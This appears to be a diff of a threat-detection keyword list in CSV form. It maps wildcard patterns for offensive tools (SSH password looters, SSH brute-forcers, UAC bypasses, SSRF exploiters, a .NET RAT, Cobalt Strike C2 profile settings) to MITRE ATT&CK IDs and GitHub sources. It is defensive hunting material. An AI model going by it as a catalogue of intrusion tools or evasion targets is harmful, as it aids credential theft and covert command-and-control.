- T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*ss -tunlp || netstat -tunlp*127.0.0.1*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*ss -tunlp || netstat -tunlp*127.0.0.1*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*ssf.exe -D * -p * 127.0.0.1*","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","10","10","1502","240","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z" "*ssfd.exe -p *","offensive_tool_keyword","ssfd","sets up a communication channel possibly for command and control (C2) or exfiltration purposes","T1218.011","TA0005","N/A","N/A","C2","https://github.com/securesocketfunneling/ssf","1","0","N/A","10","10","1502","240","2021-05-24T17:29:16Z","2015-06-01T17:34:23Z" "*ssh -N -R 4567:localhost:*root*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" -"*ssh2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*ssh2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ssh2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ssh2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*sshame*","offensive_tool_keyword","sshame","tool to brute force SSH public-key authentication","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/HynekPetrak/sshame","1","0","N/A","N/A","1","65","15","2023-04-17T12:44:57Z","2019-08-25T16:50:56Z" -"*ssh-auditor*","offensive_tool_keyword","ssh-auditor","The best way to scan for weak ssh passwords on your network.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ncsa/ssh-auditor","1","0","N/A","N/A","6","582","88","2023-02-25T01:34:02Z","2016-11-08T22:47:38Z" +"*ssh-auditor*","offensive_tool_keyword","ssh-auditor","The best way to scan for weak ssh passwords on your network.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ncsa/ssh-auditor","1","0","N/A","N/A","6","582","87","2023-02-25T01:34:02Z","2016-11-08T22:47:38Z" "*sshbrute.py*","offensive_tool_keyword","burpsuite","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z" "*SSHBruteForce.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*sshkey_persistence.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*sshkey_persistence.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*sshLooterC*","offensive_tool_keyword","sshLooterC","script to steel password from ssh - Its the C version of sshLooter. which was written in python and have a lot of dependencies to be installed on the infected machine. Now with this C version. you compile it on your machine and send it to the infected machine without installing any dependencies.","T1003 - T1059 - T1083 - T1566 - T1558.003","TA0002 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mthbernardes/sshLooterC","1","1","N/A","N/A","3","246","72","2023-06-08T21:12:10Z","2018-12-19T20:25:11Z" -"*ssh-mitm*","offensive_tool_keyword","ssh-mitm","An SSH/SFTP man-in-the-middle tool that logs interactive sessions and passwords.","T1040 - T1071 - T1552","TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/jtesta/ssh-mitm","1","1","N/A","N/A","10","1548","211","2021-07-02T02:17:26Z","2017-05-16T19:55:10Z" +"*ssh-mitm*","offensive_tool_keyword","ssh-mitm","An SSH/SFTP man-in-the-middle tool that logs interactive sessions and passwords.","T1040 - T1071 - T1552","TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/jtesta/ssh-mitm","1","1","N/A","N/A","10","1548","210","2021-07-02T02:17:26Z","2017-05-16T19:55:10Z" "*sshmon*hunt*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*sshmon*kill*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" -"*ssh-putty-brute -*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","254","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" -"*ssh-putty-brute.ps1*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","254","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" -"*SSH-PuTTY-login-bruteforcer*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","254","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" +"*ssh-putty-brute -*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","255","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" +"*ssh-putty-brute.ps1*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","255","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" +"*SSH-PuTTY-login-bruteforcer*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","255","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" "*sshuttle -r *0.0.0.0/24*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*sslstrip*","offensive_tool_keyword","sslstrip","sslstrip is a MITM tool that implements Moxie Marlinspikes SSL stripping attacks.","T1557.001 - T1573 - T1559 - T1542 - T1552","TA0002 - TA0011 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/moxie0/sslstrip","1","1","N/A","N/A","10","1821","418","2021-05-29T01:53:12Z","2011-04-24T06:40:08Z" -"*SspiUacBypass.cpp*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" -"*SspiUacBypass.exe*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" -"*SspiUacBypass-main*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","167","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*SspiUacBypass.cpp*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*SspiUacBypass.exe*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*SspiUacBypass-main*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*SSploitEnumeration*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitEnumerationDomain*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitExecution_DynamicInvoke*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" @@ -17297,25 +17480,25 @@ "*SSploitLateralMovement*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitPersistence*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitPrivilegeEscalation*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*sspr2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*--ssrf --gopher --encode --scan-action filter-bypass*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*sspr2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*--ssrf --gopher --encode --scan-action filter-bypass*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" "*ssrfmap -r *.txt -p id -m readfiles*portscan*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*SSRFmap*","offensive_tool_keyword","SSRFmap","SSRF are often used to leverage actions on other services. this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.","T1210.001 - T1190 - T1191 - T1505 - T1213","TA0007 - TA0002 - TA0008 - TA0001","N/A","N/A","Web Attacks","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2463","459","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" -"*ssrfmap.py*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2463","459","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"*SSRFmap*","offensive_tool_keyword","SSRFmap","SSRF are often used to leverage actions on other services. this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.","T1210.001 - T1190 - T1191 - T1505 - T1213","TA0007 - TA0002 - TA0008 - TA0001","N/A","N/A","Web Attacks","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"*ssrfmap.py*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" "*StackCrypt-main*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.cpp*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.exe*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.sln*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.vcxproj*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" -"*stage.obfuscate*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" -"*stage_smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*stage_transform_x64_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*stage_transform_x64_strrep1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*stage_transform_x86_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*stage_transform_x86_strrep1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 